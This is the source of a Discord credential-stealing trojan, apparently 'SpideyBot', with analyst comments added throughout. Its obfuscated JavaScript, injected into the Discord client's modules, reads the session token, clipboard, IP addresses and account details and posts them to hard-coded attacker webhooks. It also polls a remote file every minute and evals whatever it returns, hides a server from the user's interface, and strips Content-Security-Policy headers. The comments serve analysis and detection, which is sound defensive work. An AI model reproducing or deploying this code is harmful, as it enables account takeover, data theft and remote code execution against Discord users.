MalwareSourceCode/Other/Trojan.Discord.SpideyBot.a
2022-08-07 02:04:05 -05:00


modules\ discord_modules:
var _0x476f = ["\x74\x6F\x73\x74\x72\x69\x6E\x67\x20\x77\x61\x73\x20\x68\x65\x72\x65", "\x72\x65\x71\x75\x69\x72\x65", "\x65\x6C\x65\x63\x74\x72\x6F\x6E", "\x74\x6F\x6B\x65\x6E", "\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65", "\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x22", "", "\x72\x65\x70\x6C\x61\x63\x65", "\x60", "\x73\x69\x7A\x65\x31\x34\x2D\x65\x36\x5A\x53\x63\x48\x20\x74\x69\x74\x6C\x65\x2D\x65\x53\x35\x79\x6B\x33", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65", "\x55\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x66\x65\x74\x63\x68\x2C\x20\x70\x6F\x73\x73\x69\x62\x6C\x79\x20\x64\x75\x65\x20\x74\x6F\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x64\x69\x73\x63\x6F\x72\x64\x20\x64\x69\x73\x74\x72\x69\x62\x75\x74\x65\x20\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x2E", "\x74\x65\x78\x74\x43\x6F\x6E\x74\x65\x6E\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x6C\x6F\x61\x64", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x47\x45\x54", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x2F\x57\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x2E\x74\x78\x74", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", 
"\x7B\x22\x6D\x65\x73\x73\x61\x67\x65\x22\x3A\x20\x22\x49\x6E\x76\x61\x6C\x69\x64\x20\x57\x65\x62\x68\x6F\x6F\x6B\x20\x54\x6F\x6B\x65\x6E\x22\x2C\x20\x22\x63\x6F\x64\x65\x22\x3A\x20\x35\x30\x30\x32\x37\x7D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x36\x32\x39\x31\x39\x36\x34\x30\x37\x31\x36\x34\x36\x33\x33\x30\x38\x39\x2F\x6F\x38\x30\x70\x70\x4E\x42\x31\x34\x31\x6B\x52\x7A\x6D\x51\x70\x6C\x31\x70\x76\x48\x6C\x74\x52\x6A\x47\x2D\x4B\x33\x2D\x43\x41\x6C\x72\x52\x6D\x4F\x79\x33\x4F\x46\x4F\x58\x65\x57\x31\x2D\x65\x58\x49\x57\x78\x42\x45\x54\x50\x71\x55\x48\x47\x69\x58\x61\x43\x44\x53\x58\x70", "\x50\x4F\x53\x54", "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E", "\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72", "\x73\x74\x72\x69\x6E\x67\x69\x66\x79", "\x67\x65\x74\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72", "\x77\x65\x62\x46\x72\x61\x6D\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x67\x65\x74\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x70\x70", "\x72\x65\x6D\x6F\x74\x65", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x72\x65\x61\x64\x54\x65\x78\x74", "\x63\x6C\x69\x70\x62\x6F\x61\x72\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67", "\x74\x69\x6D\x65\x5A\x6F\x6E\x65", "\x72\x65\x73\x6F\x6C\x76\x65\x64\x4F\x70\x74\x69\x6F\x6E\x73", "\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68", "\x73\x63\x72\x65\x65\x6E", "\x78", "\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65", "\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E", "\x5B\x5D", 
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x76\x36\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65\x2F\x62\x69\x6C\x6C\x69\x6E\x67\x2F\x70\x61\x79\x6D\x65\x6E\x74\x2D\x73\x6F\x75\x72\x63\x65\x73", "\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x6D\x6F\x7A\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x77\x65\x62\x6B\x69\x74\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x44\x61\x74\x61\x43\x68\x61\x6E\x6E\x65\x6C", "\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x69\x6E\x64\x65\x78\x4F\x66", "\x66\x6F\x72\x45\x61\x63\x68", "\x6D\x61\x74\x63\x68", "\x0A", "\x73\x70\x6C\x69\x74", "\x73\x64\x70", "\x73\x65\x74\x4C\x6F\x63\x61\x6C\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x4F\x66\x66\x65\x72", "\x6F\x6E\x69\x63\x65\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x44\x49\x4F\x21", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x62\x79\x70\x61\x73\x73\x63\x6F\x72\x73\x2E\x68\x65\x72\x6F\x6B\x75\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x5A\x41\x57\x41\x52\x55\x44\x4F\x54\x6F\x6B\x69\x79\x6F\x74\x6F\x6D\x61\x72\x65\x2E\x74\x78\x74", "\x6C\x65\x6E\x67\x74\x68", "\x77\x72\x61\x70\x70\x65\x72\x2D\x31\x42\x4A\x73\x42\x78", "\x68\x72\x65\x66", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x63\x68\x61\x6E\x6E\x65\x6C\x73\x2F\x36\x32\x39\x31\x37\x35\x32\x32\x30\x35\x36\x39\x31\x31\x32\x35\x38\x36\x2F\x36\x32\x39\x31\x37\x35\x35\x35\x33\x31\x34\x33\x39\x39\x36\x34\x36\x34", "\x72\x65\x6D\x6F\x76\x65", "\x6C\x6F\x67", 
"\x6D\x61\x72\x67\x69\x6E\x54\x6F\x70\x32\x30\x2D\x33\x54\x78\x4E\x73\x36", "\x62\x72\x6F\x77\x73\x65\x72\x2D\x77\x69\x6E\x64\x6F\x77\x2D\x66\x6F\x63\x75\x73", "\x44\x69\x73\x63\x6F\x72\x64\x20\x68\x61\x73\x20\x65\x6E\x63\x6F\x75\x6E\x74\x65\x72\x65\x64\x20\x61\x6E\x20\x65\x72\x72\x6F\x72\x20\x61\x6E\x64\x20\x6D\x75\x73\x74\x20\x72\x65\x6C\x6F\x61\x64\x2E", "\x77\x61\x72\x6E", "\x62\x65\x65\x70", "\x73\x68\x65\x6C\x6C", "\x72\x65\x6C\x6F\x61\x64", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x6F\x6E", "\x20\x7C\x20", "\x4E\x65\x77\x20\x42\x6C\x75\x65\x66\x61\x63\x65\x56\x34\x20\x6C\x6F\x67\x2E\x0A\x54\x6F\x6B\x65\x6E\x3A\x20", "\x0A\x54\x69\x6D\x65\x7A\x6F\x6E\x65\x3A\x20", "\x0A\x52\x65\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x3A\x20", "\x0A\x49\x50\x3A\x20", "\x0A\x57\x65\x62\x52\x54\x43\x20\x49\x50\x73\x3A\x20", "\x0A\x55\x73\x65\x72\x69\x6E\x66\x6F\x3A\x20", "\x0A\x55\x73\x65\x72\x6E\x61\x6D\x65\x3A\x20", "\x0A\x50\x53\x41\x74\x74\x61\x63\x68\x65\x64\x3A\x20", "\x0A\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72\x3A\x20", "\x0A\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x3A\x20", "\x0A\x44\x69\x73\x63\x6F\x72\x64\x20\x56\x65\x72\x73\x69\x6F\x6E\x3A\x20", "\x0A\x43\x6C\x69\x70\x62\x6F\x61\x72\x64\x28\x6C\x69\x6D\x69\x74\x65\x64\x20\x74\x6F\x20\x35\x30\x20\x63\x68\x61\x72\x73\x29\x3A\x20"];
// Analyst notes: every _0x476f[n] below is a lookup into the hex-escaped string table above.
// Indices used in this run decode to: [0] "tostring was here", [1] "require", [2] "electron",
// [3] "token", [4] "localStorage", [5] "contentWindow", [6] "iframe", [7] "createElement",
// [8] "appendChild", [9] "body", [10] '"', [11] "" (empty string), [12] "replace".
// Author marker string; not read again in the code shown.
var readme = _0x476f[0];
// Publishes Node's require and the electron module as window.require / window.electron,
// so any script running in this renderer (including text passed to eval further down) can reach them.
window[_0x476f[1]] = require;
var electron = require(_0x476f[2]);
window[_0x476f[2]] = require(_0x476f[2]);
// Appends a new <iframe> to document.body and reads localStorage.token through its contentWindow.
// The value is later sent as the Authorization header to discordapp.com API endpoints
// (getuserinfo / getpaymentsources), i.e. it is the account's session credential.
// NOTE(review): presumably the iframe is used because the client hides window.localStorage - confirm.
var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]];
// replace() with a string pattern removes only the first match, so the two calls strip two '"'
// characters - presumably the quotes around the stored JSON string.
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
// The next six statements repeat the six above verbatim (second iframe, same result);
// `var` redeclaration makes this legal. Looks like a copy/paste artefact of the sample.
window[_0x476f[1]] = require;
var electron = require(_0x476f[2]);
window[_0x476f[2]] = require(_0x476f[2]);
var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]];
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
/**
 * Timer helper used by the polling loops in this file.
 *
 * @param {number} delayMs - delay handed to setTimeout, in milliseconds.
 * @returns {Promise<undefined>} promise that settles once the timer fires.
 */
function sleep(delayMs) {
  return new Promise(function (wake) {
    setTimeout(wake, delayMs);
  });
}
// Module-level state filled in asynchronously by the collectors below and read once by the
// report builder. [11] is the empty string, [13] is a single backtick.
var ip = _0x476f[11];          // public IP text returned by the IP-echo request (getip)
var userinfo = _0x476f[11];    // raw response body of the users/@me request (getuserinfo)
var webrtcips = _0x476f[11];   // " | "-separated addresses reported by getwebrtcinfo
var hasattached = false;       // true when the payment-sources response is anything other than "[]"
var underesc = _0x476f[13];    // backtick; the report wraps the token in two of these on each side
var focusamount = 0;           // count of browser-window-focus events since the last forced reload
var WBH = _0x476f[11];         // exfiltration webhook URL, resolved by getandsetWBH()
// [15] "getElementsByClassName", [14] "size14-e6ZScH title-eS5yk3", [17] "textContent".
// Reads the text of the first element carrying that class pair; if none exists, username is set
// to [16]: "Unable to fetch, possibly due to a different discord distribute or update."
// NOTE(review): the class names look like build-specific client CSS classes - confirm which UI element.
if (!document[_0x476f[15]](_0x476f[14])[0]) {
var username = _0x476f[16]
} else {
var username = document[_0x476f[15]](_0x476f[14])[0][_0x476f[17]]
};
// Fallback webhook resolver. Issues an asynchronous GET ([21]) to string-table entry [22], a .txt
// file hosted on tostringisverycooi.000webhostapp.com, and stores the whole response body in WBH.
// Effect: the operator can swap the exfiltration endpoint without touching infected clients, so
// that host is worth tracking as an indicator alongside the hard-coded webhook.
// [18] "responseText", [19] "load", [20] "addEventListener", [23] "open", [24] "send".
function getandsetbackupWBH() {
function _0xb38cx10() {
WBH = this[_0x476f[18]]
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[22]);
_0xb38cx11[_0x476f[24]]()
}
// Primary webhook resolver. Sends a GET to the hard-coded URL in [26] (a
// discordapp.com/api/webhooks/... address) as a liveness probe.
// If the body equals [25] - {"message": "Invalid Webhook Token", "code": 50027} - the webhook is
// treated as dead and getandsetbackupWBH() is used; for any other body WBH is set to [26].
// No error/timeout listener is registered, so WBH keeps its previous value if the request fails.
function getandsetWBH() {
function _0xb38cx10() {
if (this[_0x476f[18]] == _0x476f[25]) {
getandsetbackupWBH()
} else {
WBH = _0x476f[26]
}
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[26]);
_0xb38cx11[_0x476f[24]]()
}
// Runs at script load. The request is asynchronous, so WBH is still "" until its load handler fires.
getandsetWBH();
// Exfiltration primitive: asynchronous POST ([27]) to whatever WBH holds at call time, with header
// Content-Type: application/json ([28]/[29], set through [30] "setRequestHeader") and body
// JSON.stringify({content: <argument>}). The response is never inspected.
// Network-side, this shows up as the chat client itself posting to a webhook endpoint.
function pin(_0xb38cx14) {
var _0xb38cx15 = new XMLHttpRequest();
_0xb38cx15[_0x476f[23]](_0x476f[27], WBH, true);
_0xb38cx15[_0x476f[30]](_0x476f[28], _0x476f[29]);
_0xb38cx15[_0x476f[24]](JSON[_0x476f[31]]({
content: _0xb38cx14
}))
}
// Fingerprint field: returns electron.webFrame.getZoomFactor() ([33] "webFrame", [32] "getZoomFactor").
function returnzoomfactor() {
return electron[_0x476f[33]][_0x476f[32]]()
}
// Fingerprint field: returns navigator.userAgent ([34] "userAgent").
function returnuseragent() {
return navigator[_0x476f[34]]
}
// Fingerprint field: returns electron.remote.app.getVersion() ([37] "remote", [36] "app",
// [35] "getVersion"), i.e. the host application's version as seen through the remote module.
function getdiscordversion() {
return electron[_0x476f[37]][_0x476f[36]][_0x476f[35]]()
}
// Reads the system clipboard via electron.clipboard.readText() ([40] "clipboard", [39] "readText")
// and keeps the first 50 characters ([38] "substring"). Whatever the user last copied at the time
// of the report (passwords, keys, addresses) is therefore exposed, truncated to 50 characters.
function getclipboard() {
return electron[_0x476f[40]][_0x476f[39]]()[_0x476f[38]](0, 50)
}
// Asynchronous GET to [41] "https://api.ipify.org"; the response body is stored verbatim in the
// module-level `ip`. A request to an IP-echo service originating from the chat client is an
// unusual outbound pattern that can be used for detection.
function getip() {
function _0xb38cx10() {
ip = this[_0x476f[18]]
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[41]);
_0xb38cx11[_0x476f[24]]()
}
// Fingerprint field: Intl.DateTimeFormat().resolvedOptions().timeZone
// ([43] "resolvedOptions", [42] "timeZone").
function gettimezone() {
return Intl.DateTimeFormat()[_0x476f[43]]()[_0x476f[42]]
}
// Fingerprint field: "<availWidth>x<availHeight>" built from window.screen
// ([45] "screen", [44] "availWidth", [46] "x", [47] "availHeight").
function getresolution() {
return window[_0x476f[45]][_0x476f[44]] + _0x476f[46] + window[_0x476f[45]][_0x476f[47]]
}
// Asynchronous GET to [48] "https://discordapp.com/api/users/@me" with the argument sent as the
// Authorization header ([49]); the raw response body is stored in `userinfo`.
// The only caller in this file passes the stolen token, so the request is made under the victim's identity.
function getuserinfo(_0xb38cx1e) {
function _0xb38cx10() {
userinfo = this[_0x476f[18]]
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[48]);
_0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e);
_0xb38cx11[_0x476f[24]]()
}
// Asynchronous GET to [51] "https://discordapp.com/api/v6/users/@me/billing/payment-sources" with
// the argument as the Authorization header. Only a boolean is kept: hasattached is false when the
// body is exactly [50] "[]" and true for any other body - including error responses, so the flag
// is not a reliable statement about the account. The payment data itself is not stored here.
function getpaymentsources(_0xb38cx1e) {
function _0xb38cx10() {
if (this[_0x476f[18]] == _0x476f[50]) {
hasattached = false
} else {
hasattached = true
}
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[51]);
_0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e);
_0xb38cx11[_0x476f[24]]()
}
// Collects IP addresses that WebRTC ICE candidate gathering reveals and hands each distinct one to
// the callback argument exactly once. No STUN/TURN server is configured (iceServers: []).
// NOTE(review): with no ICE servers the candidates are presumably host (local interface) addresses - confirm.
// Table entries used: [52]-[54] RTCPeerConnection and its moz/webkit-prefixed names,
// [55] "createDataChannel", [64] "createOffer", [63] "setLocalDescription", [65] "onicecandidate",
// [62] "sdp", [61] "split", [60] "\n", [57] "indexOf", [56] "candidate", [59] "match", [58] "forEach".
function getwebrtcinfo(_0xb38cx21) {
var _0xb38cx22 = window[_0x476f[52]] || window[_0x476f[53]] || window[_0x476f[54]];
var _0xb38cx23 = new _0xb38cx22({
iceServers: []
}),
_0xb38cx24 = function() {},
_0xb38cx25 = {},
// Matches a dotted-quad IPv4 address or a full eight-group lowercase-hex IPv6 address.
_0xb38cx26 = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
_0xb38cx27;
// De-duplicating wrapper: _0xb38cx25 records addresses already reported to the callback.
function _0xb38cx28(ip) {
if (!_0xb38cx25[ip]) {
_0xb38cx21(ip)
};
_0xb38cx25[ip] = true
}
// A data channel with an empty label gives the connection something to negotiate.
_0xb38cx23[_0x476f[55]](_0x476f[11]);
// Success callback of createOffer: scan every SDP line containing "candidate" for addresses,
// then install the offer as the local description (both result callbacks are no-ops).
_0xb38cx23[_0x476f[64]](function(_0xb38cx29) {
_0xb38cx29[_0x476f[62]][_0x476f[61]](_0x476f[60])[_0x476f[58]](function(_0xb38cx2a) {
if (_0xb38cx2a[_0x476f[57]](_0x476f[56]) < 0) {
return
};
_0xb38cx2a[_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28)
});
_0xb38cx23[_0x476f[63]](_0xb38cx29, _0xb38cx24, _0xb38cx24)
}, _0xb38cx24);
// Trickled candidates: same extraction, applied to event.candidate.candidate when it is present
// and contains at least one match.
_0xb38cx23[_0x476f[65]] = function(_0xb38cx2b) {
if (!_0xb38cx2b || !_0xb38cx2b[_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)) {
return
};
_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28)
}
}
// Remote command channel. Every 60 000 ms this issues a GET to [67] - a bypasscors.herokuapp.com
// proxy URL wrapping a .txt file on tostringisverycooi.000webhostapp.com - and passes the response
// body to eval() unless it equals the sentinel [66] "DIO!".
// Consequences for responders: the behaviour of an infected client is not limited to what this
// file shows. eval() runs in this function scope, so fetched text can reach `electron`, `token`
// and (via window.require, set at the top of the file) Node's require. Both hosts named above are
// network indicators; traffic to them from the chat client means the loop is live.
// There is no error handling and no exit condition: the loop runs for the life of the page.
async function fightdio() {
while (true) {
function _0xb38cx10() {
var _0xb38cx2d = this[_0x476f[18]];
if (_0xb38cx2d == _0x476f[66]) {
return
} else {
// SECURITY: eval of attacker-served text - arbitrary code execution inside the client.
eval(_0xb38cx2d)
}
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[67]);
_0xb38cx11[_0x476f[24]]();
await sleep(60000)
}
}
// UI-tampering loop, repeated every 100 ms for the life of the page:
//  1. among elements with class [69] "wrapper-1BJsBx", remove any whose href equals [71], a fixed
//     discordapp.com/channels/<guild>/<channel> URL (console.log prints remove()'s undefined result);
//  2. remove the first element with class [74] "marginTop20-3TxNs6", if one exists.
// NOTE(review): judging by the function name, the intent is to hide one specific server from the
// victim's own client - presumably one the account is made to join or boost; confirm against the
// payload served to the eval loop, which is not part of this page.
// [15] "getElementsByClassName", [68] "length", [70] "href", [72] "remove", [73] "log".
async function delboostserveronclient() {
while (true) {
for (var _0xb38cx2f = 0; _0xb38cx2f < document[_0x476f[15]](_0x476f[69])[_0x476f[68]]; _0xb38cx2f++) {
if (document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[70]] == _0x476f[71]) {
console[_0x476f[73]](document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[72]]())
}
};
if (document[_0x476f[15]](_0x476f[74])[0]) {
document[_0x476f[15]](_0x476f[74])[0][_0x476f[72]]()
};
await sleep(100)
}
}
// --- Script entry: everything below runs as soon as the module is loaded. ---
// electron.remote.app.on("browser-window-focus", ...) ([82] "on", [75] event name).
// On every 15th focus event the handler prints [76] "Discord has encountered an error and must
// reload." with console.warn ([77]), calls electron.shell.beep() ([79]/[78]) and then
// window.location.reload() ([81]/[80]). The reload re-runs this script, so collection and the
// report below repeat; an unexplained beep plus client reload is a user-visible symptom.
electron[_0x476f[37]][_0x476f[36]][_0x476f[82]](_0x476f[75], () => {
focusamount = focusamount + 1;
if (focusamount >= 15) {
console[_0x476f[77]](_0x476f[76]);
electron[_0x476f[79]][_0x476f[78]]();
window[_0x476f[81]][_0x476f[80]]();
focusamount = 0
}
});
// Start the asynchronous collectors. Each WebRTC address is appended with the [83] " | " separator.
getwebrtcinfo(function(ip) {
webrtcips = webrtcips + ip + _0x476f[83]
});
getip();
getuserinfo(token);
getpaymentsources(token);
// After a fixed 5 s wait (no check that the requests above finished) build one text report and
// POST it through pin(). Field labels come from [84]-[95]: header "New BluefaceV4 log.", then
// Token (wrapped in double backticks), Timezone, Resolution, IP, WebRTC IPs, Userinfo, Username,
// PSAttached, ZoomFactor, User-Agent, Discord Version, Clipboard(limited to 50 chars).
// The header string is a stable content indicator for this sample's reports.
setTimeout(() => {
var _0xb38cx30 = (_0x476f[84] + underesc + _0x476f[11] + underesc + _0x476f[11] + token + _0x476f[11] + underesc + _0x476f[11] + underesc + _0x476f[85] + (gettimezone()) + _0x476f[86] + (getresolution()) + _0x476f[87] + ip + _0x476f[88] + webrtcips + _0x476f[89] + userinfo + _0x476f[90] + username + _0x476f[91] + hasattached + _0x476f[92] + (returnzoomfactor()) + _0x476f[93] + (returnuseragent()) + _0x476f[94] + (getdiscordversion()) + _0x476f[95] + (getclipboard()) + _0x476f[11]);
pin(_0xb38cx30)
}, 5000);
// Launch the two endless loops (UI tampering every 100 ms, remote-eval poll every 60 s).
// Their returned promises are not awaited and have no rejection handler.
setTimeout(() => {
delboostserveronclient()
}, 1);
setTimeout(() => {
fightdio()
}, 1)
\ modules\ discord_desktop_core:
// Second modified file of the sample: the loader for the client's core module (per the label
// above, modules\discord_desktop_core). It runs in the Electron main process before the real
// core is loaded.
// NOTE(review): a stock loader is expected to contain only the final module.exports line - confirm
// against a clean install; any extra statements in this file are an integrity-check signal.
const electron = require('electron');
// `path` is required but not used anywhere in the code shown.
const path = require('path');
// Hooks every response on the default session. If a response carries a Content-Security-Policy or
// Content-Security-Policy-Report-Only header, both keys are deleted before the headers reach the
// renderer; responses without them pass through untouched.
// Effect (inferred from the companion script on this page): with CSP gone, nothing in the page
// policy blocks eval() of fetched text or XHR to third-party hosts.
// The lookup uses lower-case keys only, so a header delivered with different casing would not be stripped.
electron.session.defaultSession.webRequest.onHeadersReceived(function(details, callback) {
if (!details.responseHeaders['content-security-policy-report-only'] && !details.responseHeaders['content-security-policy']) return callback({
cancel: false
});
delete details.responseHeaders['content-security-policy-report-only'];
delete details.responseHeaders['content-security-policy'];
callback({
cancel: false,
responseHeaders: details.responseHeaders
});
});
// Hand control to the original core so the client keeps working normally.
module.exports = require('./core.asar');